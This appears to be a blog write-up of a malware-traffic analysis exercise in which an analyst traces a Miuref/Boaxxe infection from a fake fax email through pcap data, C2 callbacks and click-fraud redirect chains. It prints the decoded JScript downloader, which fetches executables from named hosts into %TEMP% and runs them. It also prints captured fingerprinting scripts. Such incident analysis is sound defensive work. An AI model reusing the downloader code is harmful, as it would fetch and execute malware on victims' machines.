\n> Based on what Snort (using the Emerging Threats ruleset in Security Onion) is telling me, this looks to be a Miuref\/Boaxxe infection as I am seeing some of the same characteristics that Brad documented in a write-up for SANS ISC<\/a>. <\/p>\n
– The root cause (what is the likely cause of the infection noted in the pcap). Notes about investigation I started by looking at the PCAP via the “Statistics \u2014> Protocol Hierarchy” option to get an idea of what all is in the PCAP and what I may need to pay attention to. In this case I did not see anything that stood out to me or anything that was out-of-the ordinary. I then looked at “Statistics \u2014> Conversations” to see if there were any non-standard ports used in the conversations. It is here that I saw two things jump out at me:<\/p>\n \t– Most UDP traffic is to Google DNS (8.8.8.8) With that information in hand, I used the filter “http.request” in Wireshark to see what the HTTP traffic looks like. The first of the HTTP requests was for the site kennedy[.]siteoserver[.]com:<\/p>\n The hostname above matches what I saw in the JS file that was attached to the email mentioned above when I decoded it within Malzilla:<\/p>\n \t***As a side note, I did not see any of the other domains from this script within the PCAP.<\/p>\n Funny thing about this one is that it drops three executables onto the victim’s system which is labeled as an “image\/gif” via Content-Type even though they are clearly not image files:<\/p>\n After the 3 files are downloaded and executed, it looks as if only one (fax-exec3.exe) may have executed from the above script since it matches some of the connections from the Malwr results below. Most of the connections seem to return a 404 error page. I also did see it connect to some “normal” looking sites as well (ie: micorsoft.com\/google.com), but do not know why (I can only speculate to verify that the malware somehow ran correctly). <\/p>\n The following examples are from the “successful” connections from the PCAP since there were a lot of 404 error pages found in the exercise:<\/p>\n ***From what it looks like above, this looks to be Miuref\/Boaxxe callback traffic.<\/p>\n This connection was interesting since the infection chain was long before it hit a redirect:<\/p>\n Another POST to a remote server:<\/p>\n Through another redirect:<\/p>\n Now it looks like we may be getting somewhere:<\/p>\n So the page above has a script in it that I am not able to decode\/decipher, but there are a couple of things that caught my eye here. The first thing was the fact that I can see that the script is talking about Flash and Java. While I am not sure what this script is doing, I can only surmise that it is possibly doing version checks of Flash and Java to see if the system has vulnerable versions. The other thing that stood out is this line:<\/p>\n It stood out to me because I had never seen someone use the meta-tag to do a refresh to another URL within a second of someone landing on the original page (yeah, I am still new to being an analyst and these things are cool to me – LOL). The page that comes up initially can be seen below:<\/p>\n Once the page comes up, and the meta-tag redirect sends the user to the next page (cpv[.]popxml[.]com\/click2?i=83k5qWC18S8_2&f=&j=), it looks as if there is another redirect. It also looks as if this is part of the click-fraud activity found within this malware. Here is what it looks like from the PCAP:<\/p>\n So it looks like it is the same kind of script as one of the previous requests and also uses the meta-tag to do the redirect to another site. Following this site I saw that this is another redirect to another site – hxxp:\/\/3Point5Oz[.]com.<\/p>\n From here I saw the last POST with Wirehark:<\/p>\n So from here I decided to take the three executable files and run them on my test VM just to see what would happen. The tools used were pretty simple: Wireshark, Fiddler, Process Explorer, and Regshot. The following are my summaries of what happened when running the files. <\/p>\n About the first executable found – “exec1.exe” Based on what Regshot is telling me, there were no files dropped onto the filesystem and nothing of interest was found in the registry. I have included the Regshot log here<\/a>. From what I can tell, the malicious binary hooks into the “regsvr32.exe” process and starts to make callouts from that new process. Since the initial connection to the C2 failed, I do not believe that there were any more malicious files dropped onto the system. <\/p>\n About the second executable found – “exec2.exe” Nothing happened when I ran this executable. BOO!<\/p>\n About the third executable found – “exec3.exe” Running this executable resulted in the same type of connections trying to be established in the PCAP. I have included the Regshot log here<\/a>. From what I can tell via the VirtualBox recording that I did, the malicious binary kicks off a “svchost.exe” process with 2 child processes (dllhost.exe) which seem to be the processes that are calling out to the malicious websites based on what I am seeing via “netstat -ano.” <\/p>\n![\"SO](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-6.png\")
<\/a><\/p>\n
\n> The user executed the javascript file found in the email labeled “You have received a new fax, document 000497762.” The attachment is labeled a Word document but is clearly something else.<\/p>\n![\"Example](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-4.png\")
<\/a><\/p>\n
\n=========================<\/p>\n
\n\t– Most TCP traffic is over port 80\/443 with some over port 8080<\/p>\n\r\n\tGET \/counter\/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: kennedy.sitoserver.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:22:42 GMT\r\n\tServer: Apache\r\n\tContent-Disposition: attachment; filename=a340de8dc.gif\r\n\tContent-Length: 323045\r\n\tKeep-Alive: timeout=5, max=100\r\n\tConnection: Keep-Alive\r\n\tContent-Type: image\/gif\r\n\r\n\tMZ......................@...............................................!..L.!This program cannot be run in DOS mode.\r\n\t<\/pre>\n
\r\n\tvar b = "kennedy.sitoserver.com nzvincent.com abama.org".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"799755"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http:\/\/"+b[i]+"\/counter\/?id="+str+"&rnd=309034"+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };\r\n\t<\/pre>\n![\"Requests](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-1.png\")
<\/a><\/p>\n![\"Properties](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-2.png\")
<\/a><\/p>\n\r\n\tGET \/nxNmV7nwZvsv5vGSPZPJc7T%2fNrnx7I9DadY%2ftrb3B%2bc3MAJwfEcizQtE24ilRQzPORPaZTUKGdUe%2fLTCU0ks7soWoPN%2fcz5UEgdakrQhIawhyJedT3XEMl0iesK824veJQ%2fFMzOLL4x7s6E9j09yV0mx46Pjm6Iww85r3IwSDCxfh28ZrCzpv5TpCI4fgKus55VUDZAvVgvzoHIXrGRA2FiaYoG5PgXBY%2b2Lo82INkeY9C99DsyHS3YnYCnSfeNhdTfvRXCOS25mDJkINxdqirrcV3%2fZkd5o6aN%2fBzTpkhsjPRFFniE2spOROS40D9rH50wbEPHaJ3xzy8GpB11TQUqmFhMxyjXcECTlVyAxyZhSZktTA6PPaKSymQ9duZDWUeUas%2bxdQa8HMuToKjuoBzZ8hDV7xIQCf3AJ55McTk2lllqjrVLMi9cTqZ8jSt%2fHRTXhq7W8gkdQifyj6QE7AozDhyVXFC45z8GNxxZV4SIuSsXKK40YOgHcvEQNlCVasFwGZeG3quixE5z29zyyIxtdA0zOZJmNfn1pTlzfIw9PLE77rae6y4C0GKOZN16nIUx1IkBWCJm3aXzRMYyg4%2ftMQPxFu1r211TgGhZ%2bd0ZxmkRNcuOa2fr5TOgqmXdkaL3O%2f26B20a69a94FHyUVfFW9kD9VCW5h8wi5NmZaKoAse7szQahQ6kS4j0 HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: 109.68.191.31\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:22:55 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t300a\r\n\t...............X.\r\n\t<\/pre>\n
\r\n\tGET \/u1483507537\/LNPnBH7vV7cp6mECnO2OgY3zIK5+oWESpllVAJoU9Fa0pczz8LwWFGg0QcBGQsp\/enwYMa1ydn2TRMHTipGnUgo6zlAGvnmvkCy31mhQITy57sDtaBg3ahKNxBm70g%3D%3D?2 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: ippthost.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:24:18 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t14\r\n\t....................\r\n\t0\r\n\t<\/pre>\n
\r\n\tGET \/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:17 GMT\r\n\tContent-Type: text\/plain\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\r\n\t11c\r\n\tO6lX+Nf7nyfMYxwxE96Ik6P8dEleiQs5AxPd3\/tWiUjN2p6D5QLw5oCX2Ucfp+0uvuHr1DdCExvW2PUvGisYmSZctpeZwG9uvdC8w6fZUDXWg6+umREiAmi68LUdRcHzeNwCKKn\/QcUBB4dMdhg\/wFpn37S9GQ85GaaDOlW5i\/jbLoCd1MeYEFFJoY5ghPVBkc99xeEgBAtC\r\n\thttp:\/\/bqsearch.com\/r?q=STEM CELL SERUM&subid=z5595&link=QihzkITVEeWXotSuUsmBXQ\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/r?q=STEM%20CELL%20SERUM&subid=z5595&link=QihzkITVEeWXotSuUsmBXQ HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:41 GMT\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tLocation: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\r\n\t38\r\n\thttp:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/search?q=STEM+CELL+SERUM&subid=z5595 HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:42 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t1e7\r\n\t...........S]O.0.}..0.!JDI..>..S...$*.JG.i...m.&q.;....s.>.>@{.u|..=..qf.<.3.D.G.K.EK.msIA(S....R.......K\r\n\t...0......Y.u..\\..xCg.........l.u>.L.*Ao..O.\/W..^..f}z.m"......)...@..9......~Z]a..%..;D%.(K.>#I..uA..J......6.X...R....N.WAUV.%....)!d.......A.y$.#.<bGo.:.\/...w......Ya...$6.V.M..&.^.R.....[....B....\r\n\t..$.n{..\r\n\t....8......4...Y]......>P*........t.?<.G.a0.wwi..0..6...".7..C...L...\r\n\tW.?.....(........-.V..J....h.\\.A.;_..E.?.;...<v..b...~0|u........~..sfy........8z.=.....qc...@~..N...\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/click?q=STEM+CELL+SERUM&subid=z5595&link=QihzkITVEeWXotSuUsmBXQ HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:42 GMT\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tLocation: http:\/\/c.feed-xml.com\/7\/cvc0cccx8a3qaau9a9f1cecb7da2e5f9d877e6d8d2e321e608x\r\n\r\n\t4b\r\n\thttp:\/\/c.feed-xml.com\/7\/cvc0cccx8a3qaau9a9f1cecb7da2e5f9d877e6d8d2e321e608x\r\n\t0\r\n\t<\/pre>\n\r\n\tPOST \/ HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: 31.192.112.238\r\n\tContent-Length: 440\r\n\tCache-Control: no-cache\r\n\r\n\tdTwV2pQ7U9vBzGQ\/oPsumG51v1shwzh1NDorW48hWZ0b3dINfog5A5CMsW19aa8qevSmU1EWw2gpjMB1FeJDbgm\/j\/B6eOh9KUcwrUQBLSXATn3pj59iY+BjTZ4LZx5OMxNyHrpc563FuUL9pEg0BuIjyvRV7u37nM1RNy+Z5VOzdhB+mhL9P9KYfshhMyE+yRU6YvoYyCmyol52Zmyc0fkuMzo0oYb+4H+C5opR5hVA6zWJt6I\/MLMWASH\/5BnTUOhy\/I5ygPh2JniW+qz4YNiLo6RsDkGJ0jBK1Bav6im\/PSDMxJvJAPBPPRCJNgG+IkCGCYefGRyUda18qXsrxwTCjlPQBI7uUK32ZEUSLKnpiAO+PFxeKNKbl7gm00M7jHAt9yiIN\/r8NB97O4U6FaBSe4P7U32JGqbOl5EJeP2EWvxf4G9YEG+v\r\n\r\n HTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:25:39 GMT\r\n\tServer: Apache\r\n\tLast-Modified: Tue, 19 Nov 2013 02:04:48 GMT\r\n\tETag: "3809a1-8-4eb7e16dd3cea"\r\n\tAccept-Ranges: bytes\r\n\tContent-Length: 8\r\n\tVary: Accept-Encoding\r\n\tConnection: close\r\n\tContent-Type: text\/html\r\n\tX-Pad: avoid browser bug\r\n\tSet-Cookie: RNLBSERVERID=ded1217; path=\/\r\n\r\n\tded1217\r\n\t<\/pre>\n
\r\n\tGET \/click?i=TKlToHigxx4_2 HTTP\/1.1\r\n\tHost: xml.admadk.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tLocation: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&i=83k5qWC18S8_2&t=224767242\r\n\tSet-Cookie: x552284792=1924035799;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 0\r\n\t<\/pre>\n
\r\n\tGET \/filter?q=STEM+CELL+SERUM&i=83k5qWC18S8_2&t=224767242 HTTP\/1.1\r\n\tHost: jfilter.popxml.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tCache-Control: no-store\r\n\tPragma: no-cache\r\n\tAge: 0\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tSet-Cookie: c-1104858939=1924035799;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 4650\r\n\r\n\t<!DOCTYPE HTML>\r\n\t<html>\r\n\t<head>\r\n\t<script type="text\/javascript">\r\n\r\n\t(function(c,d){var b={K:"c-1104858939=1924035799",J:"b",a:0,h:function(a){var b=[],c;for(c in a)b.push(c+"="+encodeURIComponent(a[c]));return b.join("&").replace(\/%20\/g,"+")},g:function(a){return null==a?null:a.width+"x"+a.height},I:function(a){return null==a?null:a.left+"x"+a.top},u:function(){var a=screen.width,b=screen.height;return a&&b?{width:a,height:b}:null},A:function(){var a=c.innerWidth||d.documentElement.offsetWidth||d.body.clientWidth,b=c.innerHeight||d.documentElement.offsetHeight||d.body.clientHeight;\r\n\treturn a&&b?{width:a,height:b}:null},w:function(){return"undefined"!=typeof c.screenLeft?{left:c.screenLeft,top:c.screenTop}:"undefined"!=typeof c.screenX?{left:c.screenX,top:c.screenY}:null},D:function(){b.c="jc";b.f=Math.floor(1E4*Math.random());var a=b.c+"="+b.f;d.cookie=a;return 0>d.cookie.indexOf(a)?0:1},B:function(){return 0>d.cookie.indexOf(b.K)?0:1},G:function(){return c==c.parent?0:1},C:function(){b.a=1;b.submit();return!1},i:function(){if("undefined"!=typeof navigator.plugins&&"object"==\r\n\ttypeof navigator.plugins["Shockwave Flash"]){var a=navigator.plugins["Shockwave Flash"].description;if(a&&("undefined"==typeof navigator.mimeTypes||!navigator.mimeTypes["application\/x-shockwave-flash"]||navigator.mimeTypes["application\/x-shockwave-flash"].enabledPlugin)){var a=a.replace(\/^.*\\s+(\\S+\\s+\\S+$)\/,"$1"),b=a.replace(\/^(.*)\\..*$\/,"$1"),d=a.replace(\/^.*\\.(.*)\\s.*$\/,"$1"),a=\/[a-zA-Z]\/.test(a)?a.replace(\/^.*[a-zA-Z]+(.*)$\/,"$1"):0;return b+"."+d+"."+a}}if("undefined"!=typeof c.ActiveXObject)try{if(b=\r\n\tnew ActiveXObject("ShockwaveFlash.ShockwaveFlash"))if(a=b.GetVariable("$version"))return a=a.split(" ")[1].split(","),a[0]+"."+a[1]+"."+a[2]}catch(e){}return null},m:function(){for(var a=0,b=navigator.mimeTypes.length;a<b;++a)if(null!=(resutl=navigator.mimeTypes[a].type.match(\/^application\\\/x-java-applet;jpi-version=(.*)$\/)))return resutl[1];if(navigator.plugins&&navigator.plugins.length)for(a=0,b=navigator.plugins.length;a<b;++a)if(null!=(resutl=navigator.plugins[a].name.match(\/^Java.*[\\b ]+([\\d ]+.+)$\/)))return resutl[1];\r\n\treturn null},s:function(){var a=d.referrer;if(!a)return a;var b=a.indexOf(":\/\/");0<=b&&(a=a.substring(b+3));b=a.indexOf("\/");0<=b&&(a=a.substring(0,b));return a},l:function(){return d.location.host},b:function(){return"undefined"!=typeof c.orientation?"o":"ontouchstart"in d.documentElement?"t":0<c.navigator.msMaxTouchPoints?"p":0},F:function(){if(0!=b.b())return 0;var a=d.getElementById("sw"),c=a.offsetWidth;a.style.display="none";a.style.top="100%";a.style.display="block";return 0==c-a.offsetWidth?\r\n\t1:0},v:function(){var a=navigator.userAgent;if(!a)return a;1024<a.length&&(a=a.substring(0,1024));return a},o:function(){return{rv:b.J,ss:b.g(b.u()),ws:b.g(b.A()),wp:b.I(b.w()),ce:b.D(),ck:b.c,cv:b.f,cs:b.B(),fr:b.G(),hc:b.a,fl:b.i(),jv:b.m(),sc:c.screen.colorDepth,hr:history.length,rf:b.s(),lo:b.l(),mb:b.b(),hb:b.F(),pl:navigator.platform,ua:b.v()}},submit:function(){var a=d.forms[0];a.j.value=b.h(b.o());a.submit()},H:function(){b.submit()}};c.hc=b.C;c.jsfload=b.H})(window,document);\r\n\r\n\t<\/script>\r\n\t<noscript><meta http-equiv="refresh" content='1;url=http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j='><\/noscript>\r\n\t<style type="text\/css">\r\n\t::-webkit-scrollbar { -webkit-appearance:none !important; }\r\n\t<\/style>\r\n\t<\/head>\r\n\t<body onload="window.jsfload();">\r\n\t<div id="sw" style="position:absolute; left:0px; width:100%; z-index:1;"><a href="http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j=" onclick="return window.hc();">HOME<\/a><\/div>\r\n\t<div id="main" style="position:absolute; top:0px; left:0px; z-index:2; background-color:white; width:100%; height:100%; overflow:hidden; text-align:center; line-height:2;">\r\n\t.<form action="http:\/\/cpv.popxml.com\/click2" method="get">\r\n\t..<a href="http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j=" onclick="return window.hc();"><\/a>\r\n\t..<input type="hidden" name="i" value="83k5qWC18S8_2">\r\n\t..<input type="hidden" name="f" value="">\r\n\t..<input type="hidden" name="j" id="j">\r\n\t..<noscript><center><a href="http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j=" style="color:white" onclick="return window.hc();"> <\/a><input type=submit value='Click to proceed to your destination'><\/center><\/noscript>\r\n\t..<div style="width:20px; height:10px; overflow:hidden;"> <a href="http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j=" style="" onclick="return window.hc();">Continue<\/a> <\/div>\r\n\t.<\/form>\r\n\t<\/div>\r\n\t<a href="http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j=" style="margin-left:-500px" onclick="return window.hc();">submit<\/a>\r\n\t<\/body>\r\n\t<\/html>\r\n\t<\/pre>\n\r\n\t<noscript><meta http-equiv="refresh" content='1;url=http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&f=&j='><\/noscript>\r\n\t<\/pre>\n
![\"Page](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-3.png\")
<\/a><\/p>\n\r\n\tGET \/click2?i=83k5qWC18S8_2&f=&j=rv%3Db%26ss%3D1024x713%26ws%3D752x403%26wp%3D75x75%26ce%3D1%26ck%3Djc%26cv%3D6203%26cs%3D1%26fr%3D0%26hc%3D0%26fl%3D16.0.0%26jv%3D1.7.0_71%26sc%3D32%26hr%3D3%26rf%3Dbqsearch.com%26lo%3Djfilter.popxml.com%26mb%3D0%26hb%3D0%26pl%3DWin32%26ua%3DMozilla%252F5.0%2B%28Windows%2BNT%2B6.1%253B%2BWOW64%29%2BAppleWebKit%252F537.36%2B%28KHTML%252C%2Blike%2BGecko%29%2BChrome%252F40.0.2214.111%2BSafari%252F537.36 HTTP\/1.1\r\n\tHost: cpv.popxml.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&i=83k5qWC18S8_2&t=224767242\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tLocation: http:\/\/filter.dsmedianet.com\/filter?q=STEM+CELL+SERUM&i=7FlxoTbpIdU_1&t=354933352\r\n\tSet-Cookie: x552284792=245747806;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 0\r\n\r\n\t-----\r\n\r\n\tGET \/filter?q=STEM+CELL+SERUM&i=7FlxoTbpIdU_1&t=354933352 HTTP\/1.1\r\n\tHost: filter.dsmedianet.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&i=83k5qWC18S8_2&t=224767242\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tCache-Control: no-store\r\n\tPragma: no-cache\r\n\tAge: 0\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tSet-Cookie: c-1293598575=245747806;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 4677\r\n\r\n\t<!DOCTYPE HTML>\r\n\t<html>\r\n\t<head>\r\n\t<script type="text\/javascript">\r\n\r\n\t(function(c,d){var b={K:"c-1293598575=245747806",J:"b",a:0,h:function(a){var b=[],c;for(c in a)b.push(c+"="+encodeURIComponent(a[c]));return b.join("&").replace(\/%20\/g,"+")},g:function(a){return null==a?null:a.width+"x"+a.height},I:function(a){return null==a?null:a.left+"x"+a.top},u:function(){var a=screen.width,b=screen.height;return a&&b?{width:a,height:b}:null},A:function(){var a=c.innerWidth||d.documentElement.offsetWidth||d.body.clientWidth,b=c.innerHeight||d.documentElement.offsetHeight||d.body.clientHeight;\r\n\treturn a&&b?{width:a,height:b}:null},w:function(){return"undefined"!=typeof c.screenLeft?{left:c.screenLeft,top:c.screenTop}:"undefined"!=typeof c.screenX?{left:c.screenX,top:c.screenY}:null},D:function(){b.c="jc";b.f=Math.floor(1E4*Math.random());var a=b.c+"="+b.f;d.cookie=a;return 0>d.cookie.indexOf(a)?0:1},B:function(){return 0>d.cookie.indexOf(b.K)?0:1},G:function(){return c==c.parent?0:1},C:function(){b.a=1;b.submit();return!1},i:function(){if("undefined"!=typeof navigator.plugins&&"object"==\r\n\ttypeof navigator.plugins["Shockwave Flash"]){var a=navigator.plugins["Shockwave Flash"].description;if(a&&("undefined"==typeof navigator.mimeTypes||!navigator.mimeTypes["application\/x-shockwave-flash"]||navigator.mimeTypes["application\/x-shockwave-flash"].enabledPlugin)){var a=a.replace(\/^.*\\s+(\\S+\\s+\\S+$)\/,"$1"),b=a.replace(\/^(.*)\\..*$\/,"$1"),d=a.replace(\/^.*\\.(.*)\\s.*$\/,"$1"),a=\/[a-zA-Z]\/.test(a)?a.replace(\/^.*[a-zA-Z]+(.*)$\/,"$1"):0;return b+"."+d+"."+a}}if("undefined"!=typeof c.ActiveXObject)try{if(b=\r\n\tnew ActiveXObject("ShockwaveFlash.ShockwaveFlash"))if(a=b.GetVariable("$version"))return a=a.split(" ")[1].split(","),a[0]+"."+a[1]+"."+a[2]}catch(e){}return null},m:function(){for(var a=0,b=navigator.mimeTypes.length;a<b;++a)if(null!=(resutl=navigator.mimeTypes[a].type.match(\/^application\\\/x-java-applet;jpi-version=(.*)$\/)))return resutl[1];if(navigator.plugins&&navigator.plugins.length)for(a=0,b=navigator.plugins.length;a<b;++a)if(null!=(resutl=navigator.plugins[a].name.match(\/^Java.*[\\b ]+([\\d ]+.+)$\/)))return resutl[1];\r\n\treturn null},s:function(){var a=d.referrer;if(!a)return a;var b=a.indexOf(":\/\/");0<=b&&(a=a.substring(b+3));b=a.indexOf("\/");0<=b&&(a=a.substring(0,b));return a},l:function(){return d.location.host},b:function(){return"undefined"!=typeof c.orientation?"o":"ontouchstart"in d.documentElement?"t":0<c.navigator.msMaxTouchPoints?"p":0},F:function(){if(0!=b.b())return 0;var 